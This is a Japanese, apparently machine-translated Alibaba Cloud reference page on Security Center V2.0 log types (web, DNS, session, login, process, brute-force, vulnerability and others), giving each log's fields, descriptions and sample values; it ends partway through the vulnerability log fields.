すべてのプロダクト
Search
ドキュメントセンター

Security Center:V2.0ログ辞書のログタイプとログフィールド

最終更新日:Dec 16, 2024

Security Centerのログを表示して、セキュリティイベントの特定、調査、処理をできるだけ早く行うことができます。 ログストレージ容量を購入すると、Security Centerはセキュリティイベントのセキュリティログ、ネットワークトラフィックのネットワークログ、およびホスト動作のホストログを自動的に収集します。 このトピックでは、Security CenterのV2.0ログ辞書でサポートされているログの種類と、各種類のログのフィールドについて説明します。

異なるエディションでサポートされているログタイプ

セキュリティ機能とサポートされるログタイプは、security Centerのエディションによって異なります。 完全保護モードでは、使用可能なログタイプは、購入したSecurity Centerエディションによって決まります。 クォータ管理がサポートされている部分保護モードでは、ログタイプはサーバーにバインドされているSecurity Centerエディションに基づいています。 次の表は、さまざまなエディションでサポートされているログタイプの概要です。

エディション

サポートされるログタイプ

Enterprise EditionとUltimate Edition

すべてのログタイプ

Anti-virus EditionおよびAdvanced Edition

すべてのホストログとセキュリティログ

バインドされていない承認済みサーバー

  • ネットワークログ

    説明

    ネットワークログは、バインドされていない承認済みサーバー上のEnterprise EditionまたはUltimate Editionのユーザーに対してのみサポートされます。 Anti-virus EditionまたはAdvanced Editionのユーザーは、バインドされていない承認済みサーバーにネットワークデータを記録できません。

    • Webアクセスログ

    • DNSログ

    • ネットワークセッションログ

    • ローカルDNSログ

  • ホストログ

    • Agentイベントログ

  • セキュリティログ

    • 脆弱性ログ (Basicエディションでサポートされている脆弱性のみが記録されます)

    • アラートログ (Basicエディションでサポートされているアラートのみが記録されます)

    • 構成評価ログ (ログは構成評価機能を使用した後にのみ記録されます)

    • アプリケーション保護ログ (ログはアプリケーション保護機能を使用した後にのみ記録されます)

    • 悪意のあるファイル検出ログ (ログは、悪意のあるファイル検出機能を使用した後にのみ記録されます)

    • コアファイル監視イベントログ (アラートイベントはコアファイル監視機能を使用した後にのみログに記録されます)

ログのタイプ

ネットワークログの種類

説明

Outside Chinaデータ管理センターでは、ネットワークログはサポートされていません。

ログタイプ

__topic__

説明

収集サイクル

Webアクセスログ

sas-log-http

ユーザーのIPアドレス、要求時間、要求方法、要求URL、HTTPステータスコード、および応答サイズを含む、webサーバーへのユーザー要求およびwebサーバーからの応答のログ。

Webアクセスログは、webトラフィックとユーザーの行動を分析し、アクセスパターンと例外を特定し、Webサイトのパフォーマンスを最適化するために使用されます。

ほとんどの場合、ログはログが生成されてから1〜12時間後に収集されます。

ドメインネームシステム (DNS) ログ

sas-log-dns

要求されたドメイン名、クエリタイプ、クライアントのIPアドレス、応答値など、DNS解決の詳細のログ。

DNS解決の要求と応答プロセスを監視し、DNSログに基づいて異常な解決動作、DNSハイジャック、DNSポイズニングを特定できます。

ネットワークセッションログ

sas-log-session

ネットワークセッションの詳細を含む、ネットワーク接続とデータ送信のログ。 詳細には、セッション開始時刻、送信元IPアドレス、宛先IPアドレス、プロトコル、およびポートが含まれます。

ネットワークセッションログは、一般に、ネットワークトラフィックの監視、潜在的な脅威の特定、およびネットワークパフォーマンスの最適化に使用されます。

内部DNSログ

local-dns

リクエストされたドメイン名、クエリタイプ、クライアントのIPアドレス、レスポンス値など、ローカルDNSサーバー上のDNSクエリとレスポンスのログ。

ネットワーク内のDNSクエリに関する情報を取得し、内部DNSログに基づいて、異常なクエリ動作、ドメインハイジャック、DNSポイズニングなどの問題を特定できます。

ホストログの種類

ログタイプ

__topic__

説明

収集サイクル

ログオンログ

aegis-log-login

サーバーへのユーザーログオンのログ (ログオン時間、ログオンユーザー、ログオン方法、ログオンIPアドレスなど) 。

ログオンログは、ユーザーのアクティビティを監視し、異常な動作を早期に特定して対応するのに役立ちます。 これにより、システムのセキュリティが確保されます。

説明

セキュリティセンターは、Windows Server 2008を実行しているサーバーへのログオンのログを収集しません。

ログはリアルタイムで収集されます。

ネットワーク接続ログ

aegis-log-network

サーバーへの接続の5タプル、接続時間、接続ステータスなど、ネットワーク接続のログ。

ネットワーク接続ログは、疑わしい接続の検出、潜在的なネットワーク攻撃の特定、およびネットワークパフォーマンスの最適化に役立ちます。

説明
  • サーバは、確立から終了までのネットワーク接続の一部の状態のみを収集する。

  • 着信トラフィックはログに記録されません。

ログはリアルタイムで収集されます。

プロセス起動ログ

aegis-log-process

起動時間、起動コマンド、パラメーターなど、サーバープロセスの起動ログ。

サーバープロセスの起動状態と構成を取得し、プロセスの起動ログに基づいて異常プロセス、マルウェアの侵入、脅威などの問題を特定できます。

ログはリアルタイムで収集されます。 プロセスが開始されると、ログはすぐに収集されます。

ブルートフォース攻撃ログ

aegis-log-crack

ブルートフォース攻撃のログ (ログオン試行、システム、アプリケーション、またはアカウントのクラック試行に関する情報など) 。

システムまたはアプリケーションに対するブルートフォース攻撃に関する情報を取得し、ブルートフォース攻撃ログに基づいて、異常なログオン試行、弱いパスワード、および資格情報の漏洩を特定できます。 また、ブルートフォース攻撃ログを使用して悪意のあるユーザーを追跡し、証拠を収集して、セキュリティチームのインシデント対応と調査を支援することもできます。

ログはリアルタイムで収集されます。

アカウントスナップショットログ

aegis-snapshot-host

アカウントに関する基本情報を含む、システムまたはアプリケーションのアカウントのログ。 基本情報には、アカウントのユーザー名、パスワードポリシー、およびログオン履歴が含まれます。

さまざまな時点でのアカウントのスナップショットログを比較することで、アカウントの変更を取得し、潜在的なリスクを最も早い機会に特定できます。 リスクには、不正なアカウントからのアクセスや異常なアカウントステータスが含まれます。

  • アセットフィンガープリントの自動収集タスクを設定すると、指定された頻度に基づいてアセットフィンガープリントが自動的に収集されます。 アセットフィンガープリントの自動収集タスクを設定する方法の詳細については、「アセットフィンガープリント機能の使用」をご参照ください。

  • 自動収集タスクを設定しない場合、各サーバーのフィンガープリントは1日1回、ランダムに収集されます。

ネットワークスナップショットログ

aegis-snapshot-port

5タプルの接続、接続ステータス、および関連するプロセスを含む、ネットワーク接続のログ。

システム内のネットワークソケットに関する情報を取得し、異常な接続と潜在的なネットワーク攻撃を特定し、ネットワークスナップショットログに基づいてネットワークパフォーマンスを最適化できます。

スナップショットログの処理

aegis-snapshot-process

プロセスID、プロセス名、プロセス開始時刻など、システム内のプロセスのログ。

システム内のプロセスおよびプロセスのリソース使用量に関する情報を取得し、プロセスのスナップショットログに基づいて、異常プロセス、過剰なCPU使用率、メモリリークなどの問題を特定できます。

DNSリクエストログ

aegis-log-dns-query

要求されたドメイン名、クエリタイプ、およびクエリソースを含む、サーバーによって送信されたDNS要求のログ。

ネットワーク内のDNSクエリに関する情報を取得し、DNSリクエストログに基づいて、異常なクエリ、ドメインハイジャック、DNSポイズニングなどの問題を特定できます。

説明

4.X. Xより前のカーネルバージョンを持つLinuxサーバーの場合、Security CenterはDNSリクエストログの収集や悪意のあるDNSアクティビティの検出をサポートしていません。 カーネルバージョンをアップグレードして脅威検出機能を強化することをお勧めします。

ログはリアルタイムで収集されます。

Agentイベントログ

aegis-log-client

Security Centerエージェントのオンラインおよびオフラインイベントのログ。

ログはリアルタイムで収集されます。

セキュリティログの種類

ログタイプ

__topic__

説明

収集サイクル

脆弱性ログ

sas-vul-log

脆弱性名、脆弱性ステータス、処理アクションなど、システムまたはアプリケーションで検出された脆弱性のログ。

システムの脆弱性、セキュリティリスク、攻撃傾向に関する情報を取得し、脆弱性ログに基づいて早期に適切な対策を講じることができます。

ログはリアルタイムで収集されます。

ベースラインログ

sas-hc-log

ベースラインの重大度、ベースラインの種類、リスクレベルなど、ベースラインチェック結果のログ。

ベースラインログに基づいて、システムのベースラインセキュリティステータスと潜在的なリスクを取得できます。

説明

ログには、最初にチェックに失敗したチェック項目のデータと、以前のチェックに合格したが新しいチェックに失敗したチェック項目のデータのみが記録されます。

アラートログ

sas-security-log

アラートデータソース、アラートの詳細、アラートレベルなど、システムとアプリケーションで生成されたセキュリティイベントとアラートのログ。

システム内のセキュリティイベントや脅威を取得し、アラートログを基にした早い機会に適切な対策を講じることができます。

設定評価ログ

sas-cspm-log

構成評価のチェック結果やホワイトリストにリスク項目を追加する操作など、構成評価に関連するログ。

設定評価ログに基づいて、クラウドサービスの設定のエラーと潜在的なリスクに関する情報を取得できます。

ネットワーク防御ログ

sas-net-block

攻撃タイプ、送信元IPアドレス、宛先IPアドレスなどの重要な情報を含む、ネットワーク攻撃イベントのログ。

ネットワークセキュリティイベントを取得し、適切な対応と防御策を実装して、ネットワーク防御ログに基づいてネットワークのセキュリティと信頼性を向上させることができます。

アプリケーション保護ログ

sas-rasp-log

攻撃タイプ、攻撃パターン、攻撃者IPアドレスなどの重要な情報を含む、アプリケーションに対する攻撃のログ。

アプリケーションで発生したセキュリティイベントに関する情報を取得し、適切な対応と防御策を実装して、アプリケーション保護ログに基づいてアプリケーションのセキュリティと信頼性を向上させることができます。

悪意のあるファイル検出ログ

sas-filedetect-log

ファイル情報、検出シナリオ、検出結果など、悪意のあるファイル検出のログ。

オフラインファイルやObject Storage Service (OSS) オブジェクトのランサムウェアやマイニングプログラムなどの一般的なウイルスを特定し、ログに基づいて悪意のあるファイルの拡散や実行を防ぐために、最も早い機会にウイルスを処理できます。

ネットワークログ

重要

Security Center EnterpriseおよびUltimateのみがネットワークログをサポートします。

Webアクセスログ

フィールド名

説明

response_content_length

メッセージ本文の長さ。 単位はバイトです。

612

dst_ip

宛先ホストのIPアドレス。

39.105.XX.XX

dst_port

宛先ホストのポート。

80

host

宛先ホストのIPアドレスまたはドメイン名。

39.105.XX.XX

jump_location

リダイレクトアドレス。

123

request_method

HTTP リクエストの方式。

GET

http_referer

HTTPリファラー。 このフィールドには、要求されているリソースにリンクされているwebページのURLが含まれます。

www.example.com

request_datetime

リクエストが開始された時刻。

2024-08-01 06:59:28

status

HTTP ステータスコード。

200

content_type

リクエストコンテンツのタイプ。

text/plain;charset=utf-8

response_content_type

応答コンテンツのタイプ。

text/plain; charset=utf-8

src_ip

送信元 IP アドレス。

31.220.XX.XX

src_port

送信元ポート。

59524

request_uri

URI リクエスト。

/レポート

http_user_agent

リクエストを開始するユーザーエージェント。

okhttp/3.2.0

http_x_forward_for

クライアントの送信元IPアドレスを記録するHTTPリクエストヘッダー。

31.220.XX.XX

DNSログ

フィールド名

説明

追加

DNSサーバーによって返され、CNAMEレコード、MXレコード、PTRレコードなどの情報を記録する追加フィールド。

非該当

additional_num

DNSサーバーによって返される追加レコードの数。

0

答え

DNSサーバーによって返されたDNS回答。解決結果を示します。 DNS回答には、要求されたドメイン名が解決されるIPアドレス、またはAレコードやAAAAレコードなどの他の情報が含まれます。

example.com A IN 52 1.2.XX.XX

answer_num

DNSの回答数。

1

権限

DNSサーバーによって返される権限フィールド。 権限は、ドメイン名を管理および解決するDNSサーバーです。 権限フィールドには、NSレコードなど、要求されたドメイン名のDNSレコードを提供するDNSサーバーに関する情報が含まれます。

17597のNS

authority_num

当局の数。

1

client_subnet

クライアントのサブネット。

59.152.XX.XX

dst_ip

送信先 IP アドレス。

106.55.XX.XX

dst_port

宛先ポート。

53

net_connect_dir

データ伝送の方向。 有効な値:

  • in: DNSサーバーへのリクエスト

  • out: DNSサーバーからの応答

アウト

qid

クエリのID。

13551

query_name

照会されるドメイン名。

example.com

query_type

クエリのタイプです。

A

query_datetime

クエリの時刻。

2024-08-01 08:33:58

rcode

DNSサーバーから返されたレスポンスコード。DNS解決結果を示します。

0

region

ソースリージョンのID。 有効な値:

  • 1: 中国 (北京)

  • 2: 中国 (チンタオ)

  • 3: 中国 (杭州)

  • 4: 中国 (上海)

  • 5: 中国 (深セン)

  • 6: その他のリージョン

1

response_datetime

DNSサーバーの応答時間。

2024-08-01 08:31:25

src_ip

送信元 IP アドレス。

106.11.XX.XX

src_port

送信元ポート。

22

ネットワークセッションログ

フィールド名

説明

asset_type

ログが収集されるアセットのタイプ。 有効な値:

  • ECS: Elastic Compute Service (ECS) インスタンス

  • SLB: Server Load Balancer (SLB) インスタンス

  • NAT: NAT Gateway

ECS

dst_ip

送信先 IP アドレス。

119.96.XX.XX

dst_port

宛先ポート。

443

net_connect_dir

セッションの方向。 値はoutとして固定されます。

  • protoフィールドの値がtcpの場合、このフィールドの値はアウトバウンド要求を示します。

  • protoフィールドの値がudpの場合、このフィールドの値はリクエストの方向を示すものではなく、参照専用です。

アウト

l4_proto

プロトコルのタイプ。 有効な値:

  • tcp

  • udp

tcp

session_time

セッションが開始される時刻。

2024-08-01 08:31:18

src_ip

送信元 IP アドレス。

121.40.XX.XX

src_port

送信元ポート。

53602

内部DNSログ

フィールド名

説明

anwser_name

DNS応答の名前。リソースレコードに関連付けられているドメイン名を示します。

example.com

answer_rdata

DNS回答のリソースデータ領域 (RDA) フィールドは、解決結果の特定の値を示します。

106.11.XX.XX

answer_ttl

DNS回答の有効期間 (TTL) 。 単位は秒です。

600

answer_type

DNS回答のタイプ。 有効な値:

  • 1: レコード

  • 2: NSレコード

  • 5: CNAMEレコード

  • 6: SOAレコード

  • 10: NULLレコード

  • 12: PTRレコード

  • 15: MXレコード

  • 16: TXTレコード

  • 25: キーレコード

  • 28: AAAAレコード

  • 33: SRVレコード

  • 41: OPTレコード

  • 43: DSレコード

  • 44: SSHFPレコード

  • 45: IPSECKEYレコード

  • 46: RRSIGレコード

  • 47: NSECレコード

1

dst_ip

送信先 IP アドレス。 デフォルトでは、この値は10進数のIPアドレスです。

323223 ****

dst_port

宛先ポート。

53

group_id

グループID。 同じグループIDは、同じDNS要求または応答を示します。

3

host

ホスト名を示します。

hostname

id

DNS要求またはDNS応答を識別するクエリのID。

64588

instance_id

インスタンスのID。

i-2zeg4zldn8zypsfg ****

internet_ip

DNS要求または応答に含まれるパブリックIPアドレス。

121.40.XX.XX

ip_ttl

DNS要求または応答のIPパケットのTTL。

64

query_name

照会されるドメイン名。

example.com

query_type

クエリのタイプです。 有効な値:

  • 1: レコード

  • 2: NSレコード

  • 5: CNAMEレコード

  • 6: SOAレコード

  • 10: NULLレコード

  • 12: PTRレコード

  • 15: MXレコード

  • 16: TXTレコード

  • 25: キーレコード

  • 28: AAAAレコード

  • 33: SRVレコード

1

src_ip

DNS要求または応答が開始されるIPアドレス。 デフォルトでは、この値は10進数のIPアドレスです。

168427 ****

src_port

DNS要求または応答が開始されるポートの番号。

53

start_time

開始タイムスタンプ。イベントが発生した時刻を示します。 単位は秒です。

1719472214

time_usecond

DNS要求または応答のタイムスタンプ。 単位:マイクロ秒。

590662

tunnel_id

DNS要求または応答で使用されるトンネルのID。 トンネリングは、異なるプロトコルを使用してデータを転送する方法です。 トンネリングは、インターネットへの安全なアクセス、または異なるネットワークを介した通信に使用できます。

514763

ホストログ

ログオンログ

フィールド名

説明

instance_id

インスタンスのID。

i-2zeg4zldn8zypsfg ****

host_ip

サーバーの IP アドレス。

192.168.XX.XX

sas_group_name

セキュリティセンター内のサーバーが属するアセットグループ。

default

uuid

サーバーのUUID。

5d83b26b-b7ca-4a0a-9267-12 ****

src_ip

サーバーへのログオンに使用されるIPアドレス。

221.11.XX.XX

dst_port

サーバーへのログオンに使用されるポート。

22

login_type

ログインタイプ。 有効な値には、次の値が含まれます。

  • SSHLOGINおよびSSH: SSHログイン

  • RDPLOGIN: リモートデスクトップログイン

  • IPCLOGIN: IPC接続ログオン

SSH

username

ログインに使用されるユーザー名。

admin

login_count

ログオン試行回数。

1分以内に繰り返されるログオン試行は、1つのログに記録されます。 たとえば、login_countフィールドの値が3の場合、1分以内に3回のログオン試行が行われました。

3

start_time

開始タイムスタンプ。イベントが発生した時刻を示します。 単位は秒です。

1719472214

ネットワーク接続ログ

フィールド名

説明

cmd_chain

プロセスチェーン。

[

{

"9883":"bash -c kill -0 -- '6274'"

}

......

]

cmd_chain_index

プロセスチェーンのインデックス。 インデックスを使用して、プロセスチェーンを検索できます。

B184

container_hostname

コンテナー内のサーバーの名前。

nginx-ingress-controller-765f67fd4d-****

container_id

コンテナID。

4181de1e2b20c3397f1c409266dbd5631d1bc5be7af85246b0d ****

container_image_id

イメージ ID。

registry-cn-beijing-vpc.ack.aliyuncs.com/acs/aliyun-ingress-controller@sha256:5f281994d9e71a1b1a087365271024991c5b0d0543c48f0****

container_image_name

The image name.

registry-cn-beijing-vpc.ack.aliyuncs.com/acs/aliyun-ingress-****

container_name

コンテナーの名前。The name of the container.

nginx-ingress-****

container_pid

コンテナ内のプロセスのID。

0

net_connect_dir

ネットワーク接続の方向。 有効な値:

  • アウト

in

dst_ip

送信先 IP アドレス。

  • dirの値がoutの場合、このフィールドの値はピアホストのIPアドレスです。

  • dirの値が [in] の場合、このフィールドの値はホストのIPアドレスです。

192.168.XX.XX

dst_port

宛先ポート。

443

instance_id

インスタンスのID。

i-2zeg4zldn8zypsfg ****

host_ip

サーバーの IP アドレス。

192.168.XX.XX

parent_proc_name

親プロセスファイルの名前。

/usr/bin/bash

ピッド

プロセスのID。

14275

ppid

親プロセスID。

14268

proc_name

プロセスの名前。

nginx

proc_path

プロセスへのパス。

/usr/local/nginx/sbin/nginx

proc_start_time

プロセスが開始された時刻。

非該当

connection_type

プロトコル。 有効な値:

  • tcp

  • udp

  • raw (rawソケットを示す)

tcp

sas_group_name

セキュリティセンター内のサーバーが属するアセットグループ。

default

src_ip

送信元 IP アドレス。

100.127.XX.XX

src_port

送信元ポート。

41897

srv_comm

親プロセスの親プロセスに関連付けられているコマンド名。

containerd-shim

status

ネットワーク接続のステータス。 有効な値:

  • 1: 接続が閉じられています。

  • 2: 接続を確立します。

  • 3: SYNパケットが送信される。

  • 4: SYNパケットを受信する。

  • 5: 接続が確立されました。

  • 6: 接続が閉じられるのを待っています。

  • 7: 接続が閉じられています。

  • 8: ローカルエンドポイントは、ピアエンドポイントからの接続終了要求の確認応答を待機しています。

  • 9: ローカルエンドポイントは、ピアエンドポイントから確認応答を受信した後、ピアエンドポイントからの接続終了要求を待機しています。

  • 10: ローカルエンドポイントは、ピアエンドポイントがローカルエンドポイントから確認応答を受信するのに十分な時間が経過するのを待っています。

  • 11: 接続のTCBが削除されます。

5

type

リアルタイムネットワーク接続のタイプ。 有効な値:

  • connect: TCP接続開始

  • accept: 受信したTCP接続

  • listen: ポートリスニング

聞く

uid

プロセスを開始したユーザーのID。

101

username

プロセスを開始したユーザーの名前。

root

uuid

サーバーのUUID。

5d83b26b-b7ca-4a0a-9267-12 ****

start_time

開始タイムスタンプ。イベントが発生した時刻を示します。 単位は秒です。

1719472214

プロセス起動ログ

フィールド名

説明

cmd_chain

プロセスチェーン。

[

{

"9883":"bash -c kill -0 -- '6274'"

}

......

]

cmd_chain_index

プロセスチェーンのインデックス。 インデックスを使用して、プロセスチェーンを検索できます。

B184

cmd_index

コマンドラインのパラメータのインデックス。 各2つのインデックスは、パラメータの開始とパラメータの終了を識別するためにグループ化される。

0,3,5,8

cmdline

プロセスを開始するための完了コマンド。

ipsetリストKUBE-6-CLUSTER-IP

comm

プロセスに関连するコマンド名。

非該当

container_hostname

コンテナー内のサーバーの名前。

nginx-ingress-controller-765f67fd4d-****

container_id

コンテナID。

4181de1e2b20c3397f1c409266dbd5631d1bc5be7af85246b0d ****

container_image_id

イメージ ID。

registry-cn-beijing-vpc.ack.aliyuncs.com/acs/aliyun-ingress-controller@sha256:5f281994d9e71a1b1a087365271024991c5b0d0543c48f0****

container_image_name

The image name.

registry-cn-beijing-vpc.ack.aliyuncs.com/acs/aliyun-ingress-****

container_name

コンテナーの名前。The name of the container.

nginx-ingress-****

container_pid

コンテナ内のプロセスのID。

0

cwd

プロセスの現在の作業ディレクトリ (CWD) 。

非該当

proc_name

プロセスファイルの名前。

ipset

proc_path

プロセスファイルへのフルパス。

/usr/sbin/ipset

gid

プロセスグループのID。

0

グループ名

ユーザーグループの名を指定します。

group1

instance_id

インスタンスのID。

i-2zeg4zldn8zypsfg ****

host_ip

サーバーの IP アドレス。

192.168.XX.XX

parent_cmd_line

親プロセスのコマンドライン。

/usr/local/bin/kube-proxy -- config=/var/lib/kube-proxy/config.conf -- hostname-override=cn-beijing.192.168.XX.XX

parent_proc_name

親プロセスファイルの名前。

kube-proxy

parent_proc_path

親プロセスファイルへのフルパス。

/usr/local/bin/kube-proxy

ピッド

プロセスのID。

14275

ppid

親プロセスID。

14268

proc_start_time

プロセスが開始された時刻。

2024-08-01 16:45:40

parent_proc_start_time

親プロセスが開始された時刻。

2024-07-12 19:45:19

sas_group_name

セキュリティセンター内のサーバーが属するアセットグループ。

default

srv_cmd

先祖プロセスのコマンドライン。

/usr/bin/containerd

tty

ログオンしているターミナル。 N/Aの値は、アカウントが端末ログオンに使用されていないことを示します。

非該当

uid

ユーザー ID。

123

username

プロセスを開始したユーザーの名前。

root

uuid

サーバーのUUID。

5d83b26b-b7ca-4a0a-9267-12 ****

start_time

開始タイムスタンプ。イベントが発生した時刻を示します。 単位は秒です。

1719472214

ブルートフォース攻撃ログ

フィールド名

説明

instance_id

インスタンスのID。

i-2zeg4zldn8zypsfg ****

host_ip

ブルートフォース攻撃を受けているサーバーのIPアドレス。

192.168.XX.XX

sas_group_name

セキュリティセンター内のサーバーが属するアセットグループ。

default

uuid

ブルートフォース攻撃を受けているサーバーのUUID。

5d83b26b-b7ca-4a0a-9267-12 *****

login_count

失敗したログオン試行の回数。

1分以内に繰り返されるログオン試行は、1つのログに記録されます。 たとえば、warn_countフィールドの値が3の場合、1分以内に3回のログオン試行が行われました。

3

src_ip

送信元 IP アドレス。

47.92.XX.XX

dst_port

ログインポート。

22

login_type

ログインタイプ。 有効な値:

  • SSHLOGINおよびSSH: SSHログイン

  • RDPLOGIN: リモートデスクトップログイン

  • IPCLOGIN: IPC接続ログオン

SSH

username

ログインに使用されるユーザー名。

user

start_time

開始タイムスタンプ。イベントが発生した時刻を示します。 単位は秒です。

1719472214

アカウントスナップショットログ

フィールド名

説明

account_expire

アカウントの有効期限が切れる日付。 値はnever、アカウントの有効期限が切れないことを示します。

決して

domain

アカウントが属するドメインまたはディレクトリ。 値N/Aは、アカウントがドメインに属していないことを示します。

非該当

グループ

アカウントが属するグループ。 値N/Aは、アカウントがグループに属していないことを示します。

["nscd"]

home_dir

ホームディレクトリ。システム内のファイルを保存および管理するためのデフォルトのディレクトリです。

/ユーザー /abc

instance_id

インスタンスのID。

i-2zeg4zldn8zypsfg ****

host_ip

サーバーの IP アドレス。

192.168.XX.XX

last_chg

パスワードが最後に変更された日付。

2022-11-29

last_logon

アカウントを使用して開始された最後のログインの日時。 値N/Aは、アカウントがログオンに使用されていないことを示します。

2023-08-18 09:21:21

login_ip

アカウントを使用して最後にリモートログオンを開始したIPアドレス。 値N/Aは、アカウントがログオンに使用されていないことを示します。

192.168.XX.XX

passwd_expire

パスワードの有効期限が切れた日付。 never値は、パスワードの有効期限が切れないことを示します。

2024-08-24

パーマ

アカウントにroot権限があるかどうかを示します。 有効な値:

  • 0: なし

  • 1: はい

0

sas_group_name

セキュリティセンター内のサーバーが属するアセットグループ。

default

shell

Linuxシェルコマンド。

/sbin/nologin

status

アカウントのステータス。 有効な値:

  • 0: アカウントからのログオンは許可されていません。

  • 1: アカウントからのログオンが許可されます。

0

tty

ログオンしているターミナル。 N/Aの値は、アカウントが端末ログオンに使用されていないことを示します。

非該当

username

ユーザー名を指定します。

nscd

uuid

サーバーのUUID。

5d83b26b-b7ca-4a0a-9267-12 ****

warn_time

期限切れのパスワードが通知された日付。 この値は、通知が送信されないことを示しません

2024-08-20

start_time

開始タイムスタンプ。イベントが発生した時刻を示します。 単位は秒です。

1719472214

ネットワークスナップショットログ

フィールド名

説明

net_connect_dir

ネットワーク接続の方向。 有効な値:

  • アウト

in

dst_ip

送信先 IP アドレス。

  • dirの値がoutの場合、このフィールドの値はピアホストのIPアドレスです。

  • dirの値が [in] の場合、このフィールドの値はホストのIPアドレスです。

192.168.XX.XX

dst_port

宛先ポート。

443

instance_id

インスタンスのID。

i-2zeg4zldn8zypsfg ****

host_ip

サーバーの IP アドレス。

192.168.XX.XX

ピッド

プロセスのID。

682

proc_name

プロセスの名前。

sshd

connection_type

プロトコル。 有効な値:

  • tcp4: IPv4アドレスを介したTCP接続

  • tcp6: IPv6アドレスを介したTCP接続

  • udp4: IPv4アドレスを介したUDP接続

  • udp6: IPv6アドレスを介したUDP接続

tcp4

sas_group_name

セキュリティセンター内のサーバーが属するアセットグループ。

default

src_ip

送信元 IP アドレス。

100.127.XX.XX

src_port

送信元ポート。

41897

status

ネットワーク接続のステータス。 有効な値:

  • 1: 接続が閉じられています。

  • 2: 接続を確立します。

  • 3: SYNパケットが送信される。

  • 4: SYNパケットを受信する。

  • 5: 接続が確立されました。

  • 6: 接続が閉じられるのを待っています。

  • 7: 接続が閉じられています。

  • 8: ローカルエンドポイントは、ピアエンドポイントからの接続終了要求の確認応答を待機しています。

  • 9: ローカルエンドポイントは、ピアエンドポイントから確認応答を受信した後、ピアエンドポイントからの接続終了要求を待機しています。

  • 10: ローカルエンドポイントは、ピアエンドポイントがローカルエンドポイントから確認応答を受信するのに十分な時間が経過するのを待っています。

  • 11: 接続のTCBが削除されます。

5

uuid

サーバーのUUID。

5d83b26b-b7ca-4a0a-9267-12 ****

start_time

開始タイムスタンプ。イベントが発生した時刻を示します。 単位は秒です。

1719472214

スナップショットログの処理

フィールド名

説明

cmdline

プロセスを開始するための完了コマンド。

/usr/local/share/assist-daemon/assist_daemon

instance_id

インスタンスのID。

i-2zeg4zldn8zypsfg ****

host_ip

サーバーの IP アドレス。

192.168.XX.XX

md5

バイナリファイルのMD5ハッシュ値。

説明

MD5アルゴリズムは、サイズが1 MBを超えるファイルではサポートされません。

1086e731640751c9802c19a7f53a64f5

proc_name

プロセスファイルの名前。

assist_daemon

proc_path

プロセスファイルへのフルパス。

/usr/local/share/assist-daemon/assist_daemon

ピッド

プロセスのID。

1692

pname

親プロセスファイルの名前。

systemd

sas_group_name

セキュリティセンター内のサーバーが属するアセットグループ。

default

proc_start_time

プロセスが開始された時刻。 これは組み込みのフィールドです。

2023-08-18 20:00:12

uid

プロセスを開始したユーザーのID。

101

username

プロセスを開始したユーザーの名前。

root

uuid

サーバーのUUID。

5d83b26b-b7ca-4a0a-9267-12 ****

start_time

開始タイムスタンプ。イベントが発生した時刻を示します。 単位は秒です。

1719472214

DNSリクエストログ

フィールド名

説明

domain

DNSリクエストに含まれるドメイン名。

example.aliyundoc.com

instance_id

インスタンスのID。

i-2zeg4zldn8zypsfg ****

host_ip

DNSリクエストを開始するサーバーのIPアドレス。

192.168.XX.XX

ピッド

DNSリクエストを開始するプロセスのID。

3544

ppid

DNSリクエストを開始する親プロセスのID。

3408

cmd_chain

DNS要求を開始するプロセスのチェーン。

"3544":"\" C :\\ プログラムファイル (x86)\\Alibaba\\Aegis\\AliDetect\\AlitDetect.exe \""

cmdline

DNS要求を開始するプロセスのコマンドライン。

C:\プログラムファイル (x86)\Alibaba\Aegis\AliDetect\AliDetect.exe

proc_path

DNS要求を開始するプロセスへのパス。

C:/プログラムファイル (x86)/Alibaba/Aegis/AliDetect/AliDetect.exe

sas_group_name

セキュリティセンター内のサーバーが属するアセットグループ。

default

time

DNSリクエストがキャプチャされた時刻。 ほとんどの場合、値はDNS要求が開始された時点です。

2023-08-17 20:05:04

uuid

DNS要求を開始するサーバーのUUID。

5d83b26b-b7ca-4a0a-9267-12 ****

start_time

開始タイムスタンプ。イベントが発生した時刻を示します。 単位は秒です。

1719472214

Agentイベントログ

フィールド名

説明

uuid

サーバーのUUID。

5d83b26b-b7ca-4a0a-9267-12 ****

host_ip

サーバーの IP アドレス。

192.168.XX.XX

agent_version

Security Centerエージェントのバージョン。

aegis_11_91

last_login

最後のログインのタイムスタンプ。 単位:ミリ秒。

1716444387617

platform

オペレーティングシステムのタイプ。 有効な値:

  • windows

  • linux

linux

region_id

サーバーが存在するリージョンのID。

cn-beijing

status

Security Centerエージェントのステータス。 有効な値:

  • online

  • オフライン

online

start_time

開始タイムスタンプ。イベントが発生した時刻を示します。 単位は秒です。

1719472214

セキュリティログ

脆弱性ログ

フィールド名

説明

vul_alias_name

脆弱性のエイリアス。

CESA-2023:1335: opensslセキュリティアップデート

risk_level

リスクレベル。 有効な値:

  • できるだけ早く: 高い

  • later: medium

  • nntf: ロー

後で

extend_content

脆弱性に関する拡張情報。

{"cveList":["CVE-2023-0286"],"innessy":{"gmt_create":"20230816","connect_cnt":80,"total_score":0.0,"assets_factor":1.0,"enviroment_factor":1.5,"status":"normal"},"os":"centos","" preCheck ":{}、" rpmCanUpdate ":true、" rpmEntityList ":[{" fullVersion ":" 1.0.2 k-25.el7_9 "、" kernel ":false、" matchDetail ":" openssl-libs version less than 1.0.2 k-26.el7_9 "、" matchList ":[" openssl-libs version less than 1.0.2 "" 、"nextl" result "]" path ":"/etc/pki/tls "、" result ":true、" updateCmd ":" yum update openssl-libs "、" version ":" 1.0.2 k-25.el7_9 "},{" fullVersion ":" 1.0.2 k-25.el7_9 "、" kernel ":false、" matchDetail ":" openssl version less than 1.0.2 k-26.el7_9 "、" matchList ":[" opensslバージョン1.0.2未満のk-26.el7_9 "] 、" name ":" openssl "、" nextResult ":false、" path ":"/etc/pki/CA "、" result ":true、" updateCmd ":" yum update openssl "、" バージョン ":" 1.0.2 k-25.el7_9 "}}}}

instance_id

インスタンスのID。

i-2zeg4zldn8zypsfg ****

internet_ip

ホストのパブリックIPアドレス。

39.104.XX.XX

intranet_ip

ホストのプライベートIPアドレス。

192.168.XX.XX

instance_name

ホスト名を示します。

hhht-linux-***

vul_name

脆弱性の名前。

centos:7:cesa-2023:1335

operation

脆弱性に対する操作。 有効な値:

  • 新しい

  • verify

  • 修正

new

status

ステータス情報。 有効な値:

  • 1: unfixed

  • 2: 修正失敗

  • 3: ロールバック失敗

  • 4: 固定

  • 5: ローリングバック

  • 6: 検証

  • 7: 固定

  • 8: 固定および保留中の再起動

  • 9: ロールバック

  • 10: 無視

  • 11: ロールバックと保留中の再起動

